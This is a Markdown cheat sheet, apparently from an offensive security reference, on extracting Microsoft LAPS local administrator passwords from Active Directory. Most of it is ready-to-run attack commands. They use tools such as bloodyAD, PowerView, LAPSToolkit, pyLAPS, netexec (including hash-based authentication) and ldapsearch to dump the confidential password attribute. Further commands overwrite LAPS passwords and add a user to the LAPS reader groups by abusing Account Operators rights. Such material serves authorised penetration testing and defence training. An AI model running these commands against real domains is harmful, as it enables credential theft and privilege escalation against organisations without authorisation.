93 lines
4.0 KiB
Markdown
93 lines
4.0 KiB
Markdown
# Password - LAPS
|
||
|
||
## Reading LAPS Password
|
||
|
||
> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.
|
||
|
||
|
||
### Determine if LAPS is installed
|
||
|
||
```ps1
|
||
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
|
||
Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll'
|
||
Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
|
||
```
|
||
|
||
|
||
### Extract LAPS password
|
||
|
||
> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users
|
||
- Windows/Linux:
|
||
```ps1
|
||
bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
|
||
```
|
||
- From Windows:
|
||
|
||
* adsisearcher (native binary on Windows 8+)
|
||
```powershell
|
||
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties}
|
||
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties}
|
||
```
|
||
|
||
* [PowerView](https://github.com/PowerShellEmpire/PowerTools)
|
||
```powershell
|
||
PS > Import-Module .\PowerView.ps1
|
||
PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
|
||
```
|
||
|
||
* [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit)
|
||
```powershell
|
||
$ Get-LAPSComputers
|
||
ComputerName Password Expiration
|
||
------------ -------- ----------
|
||
example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18
|
||
|
||
$ Find-LAPSDelegatedGroups
|
||
$ Find-AdmPwdExtendedRights
|
||
```
|
||
|
||
* Powershell AdmPwd.PS
|
||
```powershell
|
||
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
|
||
```
|
||
|
||
- From Linux:
|
||
|
||
* [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords:
|
||
```bash
|
||
# Read the password of all computers
|
||
./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
|
||
# Write a random password to a specific computer
|
||
./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
|
||
```
|
||
|
||
* [netexec](https://github.com/Pennyw0rth/NetExec):
|
||
```bash
|
||
netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
|
||
```
|
||
|
||
* [LAPSDumper](https://github.com/n00py/LAPSDumper)
|
||
```bash
|
||
python laps.py -u 'user' -p 'password' -d 'domain.local'
|
||
python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local'
|
||
```
|
||
|
||
* ldapsearch
|
||
```bash
|
||
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
|
||
```
|
||
|
||
|
||
### Grant LAPS Access
|
||
|
||
The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
|
||
|
||
```ps1
|
||
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||
```
|
||
|
||
|
||
## References
|
||
|
||
* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab) |